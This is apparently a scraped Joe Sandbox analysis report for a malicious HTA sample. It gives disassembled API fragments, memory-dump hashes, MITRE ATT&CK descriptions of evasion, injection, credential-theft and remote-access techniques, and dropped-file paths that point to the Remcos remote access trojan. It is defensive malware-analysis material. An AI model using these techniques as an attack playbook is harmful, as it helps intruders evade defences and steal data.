Part of subcall function 00E3F292: Sleep.KERNEL32 ref: 00E3F30A

Strings

Shell_TrayWnd, xrefs: 00E62E01

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 71a6e30276d6ebca328a4c108c422ed39f3d00ddf27b0a92c33d61b2da26f1a0
Instruction ID: b3aea42ca69b9921ad253e309ed2a473d440e4b43af626077916e171349b825f
Opcode Fuzzy Hash: 71a6e30276d6ebca328a4c108c422ed39f3d00ddf27b0a92c33d61b2da26f1a0
Instruction Fuzzy Hash: 5BD0A931B89300AAEA64A370BC0FFC72A549B04B40F900821F646BA0D0C8E06804C644

Function 00E62DBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E62DC8
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00E62DDB

Part of subcall function 00E3F292: Sleep.KERNEL32 ref: 00E3F30A

Strings

Shell_TrayWnd, xrefs: 00E62DC1

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: a8a827a5eaf3cfa2cf807c5305bb3c45f4884088276b406f4b46fc55d0ff4443
Instruction ID: b2b4e10352088b9bbc97489d5c06576166e30517a03f898ba5da35bbd2ba1aa5
Opcode Fuzzy Hash: a8a827a5eaf3cfa2cf807c5305bb3c45f4884088276b406f4b46fc55d0ff4443
Instruction Fuzzy Hash: 99D0A935B98300AAEA64A370BC0FFD72A549B00B40F500821F64ABA0D0C8E06804C640

Function 00E0C17D Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00E0C213
GetLastError.KERNEL32 ref: 00E0C221
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00E0C27C

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 49bc8f6c859960bb24317d565e94516d3fd2835c833ab67037052c55895a4270
Instruction ID: d9c91f36bd5ac736f91f65994979d7833142ac9037e766e426a944052a2ab878
Opcode Fuzzy Hash: 49bc8f6c859960bb24317d565e94516d3fd2835c833ab67037052c55895a4270
Instruction Fuzzy Hash: DB41F630600A06AFDB218FE5C844BBA7BA5EF11728F355269F955B75F1DB308D81CB60

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report c.hta

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Data Obfuscation

HIPS / PFW / Operating System Protection Evasion

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\remcos\logs.dat

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\b0f784d7-4dee-497e-8bcf-7cd9ad6e3fd7.tmp

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-250112031910Z-183.bmp

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Windows Analysis Report
c.hta

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre